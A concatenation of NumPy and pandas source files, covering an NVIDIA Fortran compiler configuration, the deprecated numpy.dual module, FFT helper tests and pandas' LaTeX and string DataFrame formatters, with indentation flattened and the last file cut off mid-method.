""" NVIDIA High Performance Computing (HPC) SDK Fortran Compiler
https://developer.nvidia.com/hpc-sdk
    Since August 2020 the NVIDIA HPC SDK includes the compilers formerly known as The Portland Group compilers,
https://www.pgroup.com/index.htm.
See also `numpy.distutils.fcompiler.pg`.
"""
compiler_type = 'nv'
description = 'NVIDIA HPC SDK'
version_pattern = r'\s*(nvfortran|(pg(f77|f90|fortran)) \(aka nvfortran\)) (?P<version>[\d.-]+).*'
executables = {
'version_cmd': ["<F90>", "-V"],
'compiler_f77': ["nvfortran"],
'compiler_fix': ["nvfortran", "-Mfixed"],
'compiler_f90': ["nvfortran"],
'linker_so': ["<F90>"],
'archiver': ["ar", "-cr"],
'ranlib': ["ranlib"]
}
pic_flags = ['-fpic']
module_dir_switch = '-module '
module_include_switch = '-I'
def get_flags(self):
opt = ['-Minform=inform', '-Mnosecond_underscore']
return self.pic_flags + opt
def get_flags_opt(self):
return ['-fast']
def get_flags_debug(self):
return ['-g']
def get_flags_linker_so(self):
return ["-shared", '-fpic']
def runtime_library_dir_option(self, dir):
return '-R%s' % dir
if __name__ == '__main__':
from distutils import log
log.set_verbosity(2)
from numpy.distutils import customized_fcompiler
print(customized_fcompiler(compiler='nv').get_version())
```
#### File: site-packages/numpy/dual.py
```python
import warnings
warnings.warn('The module numpy.dual is deprecated. Instead of using dual, '
'use the functions directly from numpy or scipy.',
category=DeprecationWarning,
stacklevel=2)
# This module should be used for functions both in numpy and scipy if
# you want to use the numpy version if available but the scipy version
# otherwise.
# Usage --- from numpy.dual import fft, inv
__all__ = ['fft', 'ifft', 'fftn', 'ifftn', 'fft2', 'ifft2',
'norm', 'inv', 'svd', 'solve', 'det', 'eig', 'eigvals',
'eigh', 'eigvalsh', 'lstsq', 'pinv', 'cholesky', 'i0']
import numpy.linalg as linpkg
import numpy.fft as fftpkg
from numpy.lib import i0
import sys
fft = fftpkg.fft
ifft = fftpkg.ifft
fftn = fftpkg.fftn
ifftn = fftpkg.ifftn
fft2 = fftpkg.fft2
ifft2 = fftpkg.ifft2
norm = linpkg.norm
inv = linpkg.inv
svd = linpkg.svd
solve = linpkg.solve
det = linpkg.det
eig = linpkg.eig
eigvals = linpkg.eigvals
eigh = linpkg.eigh
eigvalsh = linpkg.eigvalsh
lstsq = linpkg.lstsq
pinv = linpkg.pinv
cholesky = linpkg.cholesky
_restore_dict = {}
def register_func(name, func):
if name not in __all__:
raise ValueError("{} not a dual function.".format(name))
f = sys._getframe(0).f_globals
_restore_dict[name] = f[name]
f[name] = func
def restore_func(name):
if name not in __all__:
raise ValueError("{} not a dual function.".format(name))
try:
val = _restore_dict[name]
except KeyError:
return
else:
sys._getframe(0).f_globals[name] = val
def restore_all():
for name in _restore_dict.keys():
restore_func(name)
```
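A hedged sketch of how `register_func`/`restore_func` above were intended to be used, assuming SciPy is installed; the module is deprecated, so this is purely illustrative.
```python
import numpy.dual    # emits the DeprecationWarning shown above
import scipy.linalg
numpy.dual.register_func('inv', scipy.linalg.inv)   # 'inv' now resolves to SciPy
print(numpy.dual.inv is scipy.linalg.inv)           # True
numpy.dual.restore_func('inv')                      # back to numpy.linalg.inv
```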
#### File: fft/tests/test_helper.py
```python
import numpy as np
from numpy.testing import assert_array_almost_equal
from numpy import fft, pi
class TestFFTShift:
def test_definition(self):
x = [0, 1, 2, 3, 4, -4, -3, -2, -1]
y = [-4, -3, -2, -1, 0, 1, 2, 3, 4]
assert_array_almost_equal(fft.fftshift(x), y)
assert_array_almost_equal(fft.ifftshift(y), x)
x = [0, 1, 2, 3, 4, -5, -4, -3, -2, -1]
y = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4]
assert_array_almost_equal(fft.fftshift(x), y)
assert_array_almost_equal(fft.ifftshift(y), x)
def test_inverse(self):
for n in [1, 4, 9, 100, 211]:
x = np.random.random((n,))
assert_array_almost_equal(fft.ifftshift(fft.fftshift(x)), x)
def test_axes_keyword(self):
freqs = [[0, 1, 2], [3, 4, -4], [-3, -2, -1]]
shifted = [[-1, -3, -2], [2, 0, 1], [-4, 3, 4]]
assert_array_almost_equal(fft.fftshift(freqs, axes=(0, 1)), shifted)
assert_array_almost_equal(fft.fftshift(freqs, axes=0),
fft.fftshift(freqs, axes=(0,)))
assert_array_almost_equal(fft.ifftshift(shifted, axes=(0, 1)), freqs)
assert_array_almost_equal(fft.ifftshift(shifted, axes=0),
fft.ifftshift(shifted, axes=(0,)))
assert_array_almost_equal(fft.fftshift(freqs), shifted)
assert_array_almost_equal(fft.ifftshift(shifted), freqs)
def test_uneven_dims(self):
""" Test 2D input, which has uneven dimension sizes """
freqs = [
[0, 1],
[2, 3],
[4, 5]
]
# shift in dimension 0
shift_dim0 = [
[4, 5],
[0, 1],
[2, 3]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=0), shift_dim0)
assert_array_almost_equal(fft.ifftshift(shift_dim0, axes=0), freqs)
assert_array_almost_equal(fft.fftshift(freqs, axes=(0,)), shift_dim0)
assert_array_almost_equal(fft.ifftshift(shift_dim0, axes=[0]), freqs)
# shift in dimension 1
shift_dim1 = [
[1, 0],
[3, 2],
[5, 4]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=1), shift_dim1)
assert_array_almost_equal(fft.ifftshift(shift_dim1, axes=1), freqs)
# shift in both dimensions
shift_dim_both = [
[5, 4],
[1, 0],
[3, 2]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=(0, 1)), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=(0, 1)), freqs)
assert_array_almost_equal(fft.fftshift(freqs, axes=[0, 1]), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=[0, 1]), freqs)
# axes=None (default) shift in all dimensions
assert_array_almost_equal(fft.fftshift(freqs, axes=None), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=None), freqs)
assert_array_almost_equal(fft.fftshift(freqs), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both), freqs)
def test_equal_to_original(self):
""" Test that the new (>=v1.15) implementation (see #10073) is equal to the original (<=v1.14) """
from numpy.core import asarray, concatenate, arange, take
def original_fftshift(x, axes=None):
""" How fftshift was implemented in v1.14"""
tmp = asarray(x)
ndim = tmp.ndim
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, int):
axes = (axes,)
y = tmp
for k in axes:
n = tmp.shape[k]
p2 = (n + 1) // 2
mylist = concatenate((arange(p2, n), arange(p2)))
y = take(y, mylist, k)
return y
def original_ifftshift(x, axes=None):
""" How ifftshift was implemented in v1.14 """
tmp = asarray(x)
ndim = tmp.ndim
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, int):
axes = (axes,)
y = tmp
for k in axes:
n = tmp.shape[k]
p2 = n - (n + 1) // 2
mylist = concatenate((arange(p2, n), arange(p2)))
y = take(y, mylist, k)
return y
# create possible 2d array combinations and try all possible keywords
# compare output to original functions
for i in range(16):
for j in range(16):
for axes_keyword in [0, 1, None, (0,), (0, 1)]:
inp = np.random.rand(i, j)
assert_array_almost_equal(fft.fftshift(inp, axes_keyword),
original_fftshift(inp, axes_keyword))
assert_array_almost_equal(fft.ifftshift(inp, axes_keyword),
original_ifftshift(inp, axes_keyword))
class TestFFTFreq:
def test_definition(self):
x = [0, 1, 2, 3, 4, -4, -3, -2, -1]
assert_array_almost_equal(9*fft.fftfreq(9), x)
assert_array_almost_equal(9*pi*fft.fftfreq(9, pi), x)
x = [0, 1, 2, 3, 4, -5, -4, -3, -2, -1]
assert_array_almost_equal(10*fft.fftfreq(10), x)
assert_array_almost_equal(10*pi*fft.fftfreq(10, pi), x)
class TestRFFTFreq:
def test_definition(self):
x = [0, 1, 2, 3, 4]
assert_array_almost_equal(9*fft.rfftfreq(9), x)
assert_array_almost_equal(9*pi*fft.rfftfreq(9, pi), x)
x = [0, 1, 2, 3, 4, 5]
assert_array_almost_equal(10*fft.rfftfreq(10), x)
assert_array_almost_equal(10*pi*fft.rfftfreq(10, pi), x)
class TestIRFFTN:
def test_not_last_axis_success(self):
ar, ai = np.random.random((2, 16, 8, 32))
a = ar + 1j*ai
axes = (-2,)
# Should not raise error
fft.irfftn(a, axes=axes)
```
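A tiny illustration of the round trip these tests exercise: `fftshift` moves the zero-frequency bin to the centre of the spectrum and `ifftshift` undoes it exactly.
```python
import numpy as np
freqs = np.fft.fftfreq(8)            # [0., 0.125, ..., -0.25, -0.125]
centred = np.fft.fftshift(freqs)     # negative frequencies first, 0 in the middle
assert np.array_equal(np.fft.ifftshift(centred), freqs)
```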
#### File: lib/tests/test_financial_expired.py
```python
import sys
import pytest
import numpy as np
@pytest.mark.skipif(sys.version_info[:2] < (3, 7),
reason="requires python 3.7 or higher")
def test_financial_expired():
match = 'NEP 32'
with pytest.warns(DeprecationWarning, match=match):
func = np.fv
with pytest.raises(RuntimeError, match=match):
func(1, 2, 3)
```
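Per NEP 32, the expired financial functions live on in the separate `numpy_financial` package. A hedged sketch of the replacement call (this assumes `numpy_financial` is installed; the rate and payment values are arbitrary):

```python
import numpy_financial as npf

# Future value of paying 100 per period for 12 periods at 5% per period.
# The payment is negative because it is a cash outflow.
fv = npf.fv(rate=0.05, nper=12, pmt=-100, pv=0)
assert fv > 0
```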
#### File: io/formats/latex.py
```python
from __future__ import annotations
from abc import (
ABC,
abstractmethod,
)
from typing import (
Iterator,
Sequence,
)
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: str | tuple[str, str] | None
) -> tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: list[list[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> list[list[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> list[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: list[str]) -> list[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: list[str], i: int) -> list[str]:
r"""
Check the following rows to decide whether this row should start a multirow,
e.g. the rows
a & 0 &
  & 1 &
b & 0 &
become
\multirow{2}{*}{a} & 0 &
& 1 &
\cline{1-2}
b & 0 &
"""
for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
def __init__(
self,
formatter: DataFrameFormatter,
column_format: str | None = None,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
caption: str | None = None,
short_caption: str | None = None,
label: str | None = None,
position: str | None = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The column format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__, e.g. 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: str | None = None,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
caption: str | tuple[str, str] | None = None,
label: str | None = None,
position: str | None = None,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> str | None:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: str | None) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
Right alignment for numbers and left alignment for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
def _escape_symbols(row: Sequence[str]) -> list[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
List of strings that may contain special symbols.
Returns
-------
list
list of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> list[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
if __name__ == "__main__":
import doctest
doctest.testmod()
```
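For orientation, here is a small usage sketch (not part of the source tree) showing how the builder selection in `LatexFormatter._select_builder` surfaces through the public `DataFrame.to_latex` API. It assumes a pandas release in the same line as the module above, where `to_latex` still routes through these builders; the frame contents are arbitrary.

```python
import pandas as pd

df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})

# No caption/label/position and longtable=False -> TabularBuilder,
# i.e. a bare tabular environment.
bare = df.to_latex()
assert bare.lstrip().startswith("\\begin{tabular}")

# Any of caption/label/position upgrades the output to RegularTableBuilder,
# which wraps the tabular in a table environment.
wrapped = df.to_latex(caption="demo", label="tab:demo")
assert "\\begin{table}" in wrapped and "\\caption{demo}" in wrapped

# longtable=True takes precedence and selects LongTableBuilder.
long_form = df.to_latex(longtable=True, caption="demo")
assert "\\begin{longtable}" in long_form
```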
#### File: io/formats/string.py
```python
from __future__ import annotations
from shutil import get_terminal_size
from typing import Iterable
import numpy as np
from pandas.io.formats.format import DataFrameFormatter
from pandas.io.formats.printing import pprint_thing
class StringFormatter:
"""Formatter for string representation of a dataframe."""
def __init__(self, fmt: DataFrameFormatter, line_width: int | None = None):
self.fmt = fmt
self.adj = fmt.adj
self.frame = fmt.frame
self.line_width = line_width
def to_string(self) -> str:
text = self._get_string_representation()
if self.fmt.should_show_dimensions:
text = "".join([text, self.fmt.dimensions_info])
return text
def _get_strcols(self) -> list[list[str]]:
strcols = self.fmt.get_strcols()
if self.fmt.is_truncated:
strcols = self._insert_dot_separators(strcols)
return strcols
def _get_string_representation(self) -> str:
if self.fmt.frame.empty:
return self._empty_info_line
strcols = self._get_strcols()
if self.line_width is None:
# no need to wrap around, just print the whole frame
return self.adj.adjoin(1, *strcols)
if self._need_to_wrap_around:
return self._join_multiline(strcols)
return self._fit_strcols_to_terminal_width(strcols)
@property
def _empty_info_line(self) -> str:
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {pprint_thing(self.frame.columns)}\n"
f"Index: {pprint_thing(self.frame.index)}"
)
@property
def _need_to_wrap_around(self) -> bool:
return bool(self.fmt.max_cols is None or self.fmt.max_cols > 0)
def _insert_dot_separators(self, strcols: list[list[str]]) -> list[list[str]]:
str_index = self.fmt._get_formatted_index(self.fmt.tr_frame)
index_length = len(str_index)
if self.fmt.is_truncated_horizontally:
strcols = self._insert_dot_separator_horizontal(strcols, index_length)
if self.fmt.is_truncated_vertically:
strcols = self._insert_dot_separator_vertical(strcols, index_length)
return strcols
@property
def _adjusted_tr_col_num(self) -> int:
return self.fmt.tr_col_num + 1 if self.fmt.index else self.fmt.tr_col_num
def _insert_dot_separator_horizontal(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
strcols.insert(self._adjusted_tr_col_num, [" ..."] * index_length)
return strcols
def _insert_dot_separator_vertical(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
n_header_rows = index_length - len(self.fmt.tr_frame)
row_num = self.fmt.tr_row_num
for ix, col in enumerate(strcols):
cwidth = self.adj.len(col[row_num])
if self.fmt.is_truncated_horizontally:
is_dot_col = ix == self._adjusted_tr_col_num
else:
is_dot_col = False
if cwidth > 3 or is_dot_col:
dots = "..."
else:
dots = ".."
if ix == 0 and self.fmt.index:
dot_mode = "left"
elif is_dot_col:
cwidth = 4
dot_mode = "right"
else:
dot_mode = "right"
dot_str = self.adj.justify([dots], cwidth, mode=dot_mode)[0]
col.insert(row_num + n_header_rows, dot_str)
return strcols
def _join_multiline(self, strcols_input: Iterable[list[str]]) -> str:
lwidth = self.line_width
adjoin_width = 1
strcols = list(strcols_input)
if self.fmt.index:
idx = strcols.pop(0)
lwidth -= np.array([self.adj.len(x) for x in idx]).max() + adjoin_width
col_widths = [
np.array([self.adj.len(x) for x in col]).max() if len(col) > 0 else 0
for col in strcols
]
assert lwidth is not None
